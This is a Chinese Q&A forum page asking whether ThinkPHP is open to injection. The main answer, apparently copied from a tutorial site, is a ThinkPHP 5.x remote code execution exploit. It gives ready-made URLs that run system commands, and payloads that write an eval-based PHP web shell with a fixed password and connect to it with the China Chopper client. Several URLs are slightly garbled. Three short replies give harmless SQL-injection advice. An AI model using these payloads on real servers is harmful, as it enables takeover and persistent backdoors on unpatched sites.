发布网友 发布时间:2022-04-06 03:29
共4个回答
懂视网 时间:2022-04-06 07:50
下面由thinkphp框架教程栏目给大家介绍ThinkPHP 漏洞利用,希望对需要的朋友有所帮助!
thinkphp_5x_命令执行漏洞
受影响版本包括5.0和5.1版本
docker漏洞环境源码:https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0http://www.thinkphp.cn/donate/download/id/1125.html
EXPhttp://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
EXP:http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
使用菜刀连接
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane
http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane
`
热心网友 时间:2022-04-06 04:58
给你一个防范注入的建议吧,在使用thinkphp中有限使用原生的方法进行sql操作,次要的选择才是query进行sql操作,thinkphp的参数绑定机制可以很好的方法sql注入,但是如果你执意要用query操作,那就要小心再小心
热心网友 时间:2022-04-06 06:16
看你咋写,用pdo的话 就不会了 会当作字符串处理
热心网友 时间:2022-04-06 07:51
当然会